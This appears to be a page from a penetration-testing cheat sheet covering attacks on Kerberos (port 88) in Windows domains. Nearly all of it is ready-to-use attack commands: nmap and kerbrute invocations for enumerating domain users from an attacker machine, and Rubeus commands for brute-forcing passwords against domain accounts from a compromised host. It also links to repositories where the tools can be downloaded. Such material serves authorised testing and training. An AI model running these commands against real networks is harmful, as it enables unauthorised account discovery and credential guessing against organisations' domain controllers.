Kerberos (88)

User Enumeration

nmap

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm=<domain>[,userdb=<users list>] <IP>

kerbrute (on attacker machine)

Download via: https://github.com/ropnop/kerbrute

./kerbrute userenum <users list> --dc <IP> --domain <domain>

rubeus (on compromised machine)

Download via: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

# with a list of users
    .\Rubeus.exe brute /users:<users list> /passwords:<password list> /domain:<domain>

# Check all domain users again password list
    .\Rubeus.exe brute /passwords:<password list>

PreviousLDAP (389/636/3268)NextSNMP (161)

Last updated 5 months ago